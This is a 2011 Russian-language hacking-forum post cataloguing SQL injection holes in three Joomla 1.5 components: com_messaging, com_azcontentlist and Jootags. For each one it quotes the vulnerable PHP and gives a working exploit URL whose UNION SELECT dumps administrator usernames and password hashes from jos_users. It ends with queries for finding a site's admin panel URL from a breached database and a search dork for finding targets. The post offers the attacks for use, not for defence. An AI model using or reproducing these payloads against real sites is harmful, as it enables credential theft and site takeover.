Тема: Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов
Показать сообщение отдельно

  #3  
Старый 05.09.2011, 00:12
Unknown
Guest
Сообщений: n/a
Провел на форуме:
4100

Репутация: 74
По умолчанию
Понеслась...

1 :: com_messaging :: SQL-inj && v1.5

com_messaging.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

require_once([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]DS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'helper.php'[/COLOR][COLOR="#007700"]);

...

[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mesuid'[/COLOR][COLOR="#007700"]];

...

[/COLOR][COLOR="#0000BB"]$messages[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]modMessagingHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getMessaging[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR
helper.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]guest[/COLOR][COLOR="#007700"]){

 return -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

 }else{

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" SELECT * FROM #__messaging WHERE idTo='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]' AND seen=0 ORDER BY date DESC"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();

 return[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);

 }

 }

}

[/COLOR][COLOR="#0000BB"]?>

[/COLOR][/COLOR] 
exploit:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_messaging&view=message&mesuid=-666++union+select+1,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),3,4,5,6,7,8,9+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

[/COLOR][/COLOR
2 :: com_azcontentlist :: SQL-inj && v1.5

azcontentlist.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]JDate[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$now[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]toMySQL[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$nullDate[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getNullDate[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT c.title AS title, c.id, c.catid, c.sectionid, cc.title AS category, s.title AS section FROM #__content AS c"

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__categories AS cc ON cc.id = c.catid'

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__sections AS s ON s.id = c.sectionid'

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE c.access = 0 AND c.state = 1"

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' AND cc.access = 0'

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' AND s.access = 0'

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" AND ( publish_up = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]" OR publish_up [/COLOR][COLOR="#0000BB"]Quote[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$now[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" )"

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY title"

[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadAssocList[/COLOR][COLOR="#007700"]();

 echo[/COLOR][COLOR="#DD0000"]'A-Z Site Map'[/COLOR][COLOR="#007700"];

 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 foreach([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]//$app =& JFactory::getApplication();

 //$Itemid = $app->getItemid( $result['id'] );

[/COLOR][COLOR="#007700"]...

[/COLOR][/COLOR
exploit:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_azcontentlist&view=title&cat=3&date=-666++union+select+1,2,3,4,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),6,7+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

[/COLOR][/COLOR
3 :: Jootags component :: SQL-inj && v1.5

tags.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

 function[/COLOR][COLOR="#0000BB"]getTagByTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' SELECT t.id '

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' FROM #__jootags_tags AS t '

[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE t.title='[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]LoadResult[/COLOR][COLOR="#007700"]();

}

...

[/COLOR][/COLOR
controller.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDocument[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$viewType[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getType[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$viewName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getCmd[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getName[/COLOR][COLOR="#007700"]() );

[/COLOR][COLOR="#0000BB"]$viewLayout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getCmd[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'layout'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'default'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JComponentHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getParams[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'com_jootags'[/COLOR][COLOR="#007700"]);;

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getView[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$viewName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$viewType[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'base_path'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_basePath[/COLOR][COLOR="#007700"]));

 if ([/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getModel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'tags'[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setModel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);

 }

=====>>>> list([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tag_title[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getTagByTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'tag'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];

 if ([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getData[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limitstart[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tag_title[/COLOR][COLOR="#007700"]);

 } else {

[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]JText[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Tags'[/COLOR][COLOR="#007700"]));

 }

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLayout[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$viewLayout[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR
exploit:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_jootags&itemid=8&view=model&tag=-666++union+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),9,10,11,12+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

[/COLOR][/COLOR
Достаем url ресурса из БД.

Кто знает - поймет. Ох сколько я мучался найдя таблицы джумлы в базе, на которую ссылается, к примеру, какой-нибудь wp'шный сайт. И как всегда - ответ перед носом!

SELECT link FROM jos_menu WHERE alias = adminlink [version 1.5]

На выходе увидите урл админки, конечно же с текущим ресурсом!

p.s. z0mbyak, если ты это знал и не запостил где-нить...ц...на сколько ж я ресурсов забил из-за этого...ты бы знал...

============

UPDATE #1

Такс...то что выше - это для версии 1.5

SELECT link FROM jos_menu WHERE title = admin [version 1.6]

============

UPDATE #2 (метод для всех веток)

Код:
Code:
SELECT name FROM u158069.joomla_menu LIMIT 0,1 (а)

SELECT link FROM u158069.joomla_menu LIMIT 0,1 (b)
Код:
Code:
dork: inurl:b intext:a
 
Ответить с цитированием